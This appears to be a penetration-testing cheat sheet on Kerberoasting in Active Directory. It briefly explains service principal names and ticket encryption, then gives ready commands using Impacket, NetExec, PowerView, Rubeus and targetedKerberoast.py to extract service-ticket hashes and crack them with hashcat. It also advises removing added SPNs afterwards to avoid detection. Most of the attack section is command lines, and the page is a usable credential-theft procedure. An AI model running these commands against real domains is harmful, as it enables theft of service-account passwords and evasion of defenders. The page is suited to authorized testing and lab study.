Kerberoasting

Concept

Kerberoasting is an attack on the Service Ticket (ST) and Service Principal Names (SPNs). SPNs are unique IDs that Kerberos uses to map a service instance, for example MySQL, to a service sign-in account, such as svc_mysql, in whose, often privileged, context the service is running. The ST is encrypted with the service's account NTLM hash, so it can potentially be cracked. Any domain user can request a ST from the DC for any SPN account.

Accounts like krbtgt, computer accounts, and (g)MSAs are usually resistant due to complex, long passwords.

Figure 1: The Kerberos authentication process (image taken from here).

Typically, Kerberoasting happens after compromising a domain user. However, according to new research, it is possible to perform this attack with an account susceptible to ASREPRoast (for an example of this check Rebound).

Attack

Linux

We can check if an account has an SPN using PowerView.

# Confirm that the target account has SPN
sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete

If time sync errors occur, i.e., KRB_AP_ERR_SKEW(Clock skew too great) :

sudo ntpdate 192.168.50.70

Then we can proceed to Kerberoast the target account with NetExec or Impacket's GetUserSPNs.

# Kerberoast the target account with NetExec
nxc ldap 192.168.0.104 -u user -p pass --kerberoasting output.txt

# Kerberoast the target account with Impacket's GetUserSPNs
impacket-GetUserSPNs -dc-ip 172.16.5.5 DOMAIN/user -request -outputfile spns.lst

# Kerberoast an account susceptible to ASREPRoasting with Impacket's GetUserSPNs
impacket-GetUserSPNs -no-preauth jjones -usersfile dom_users -dc-host 10.10.11.231 rebound.htb/ -outputfile kerb.txt

For an example of Kerberoasting with NetExec check here.

Finally, we can crack the hashes using hashcat.

sudo hashcat -m 13100 hashes.kerberoast rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Windows

We can check if an account has an SPN using PowerView or Rubeus.

# Confirm that the target account has SPN with PowerView
Get-DomainUser 'sqldev' | Select serviceprincipalname
# Enumerate all user-linked SPNs and extract TGS-REP hashes with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Then we can proceed to Kerberoast the target account with PowerView or Rubeus.

# Kerberoast the target account with PowerView
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# Kerberoast the target account with Rubeus
.\Rubeus.exe kerberoast /creduser:domain\user1 /credpassword:pass /user:targetUser /outfile:hash.txt /format:hashcat /nowrap

# Kerberoast an account susceptible to ASREPRoasting with Rubeus
.\Rubeus.exe kerberoast /domain:<domain> /dc:<ip> /nopreauth:<user> /spns:<username-list>

For an example of Kerberoasting with Rubeus check here.

Finally, we can crack the hashes on our attacking machine using hashcat.

sudo hashcat -m 13100 hashes.kerberoast rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Optionally, we can clear the SPNs of the target account.

# Clear the SPNs of the target account
Set-DomainObject -Identity sqldev -Clear serviceprincipalname

Targeted Kerberoasting

If we have GenericWrite or GenericAll on a user object, we can set an SPN on that user account and then extract and crack the TGS. This attack can be performed with targetedKerberoast.py.

Remember to clean up by removing the SPN afterward to avoid detection!

targetedKerberoast.py -v -d <DOMAIN_FQDN> -u <USER> -p <PASSWORD>

Resources

Demo

Kerberoasting in 14 minutes!

GetUserSPNs

How GetUserSPNs script work behind the scenes!

Lecture

Article

Detecting Kerberoasting ActivityActive Directory Security

A great article detailing the Kerberoasting process.

targetedKerberoast

GitHub - ShutdownRepo/targetedKerberoast: Kerberoast with ACL abuse capabilitiesGitHub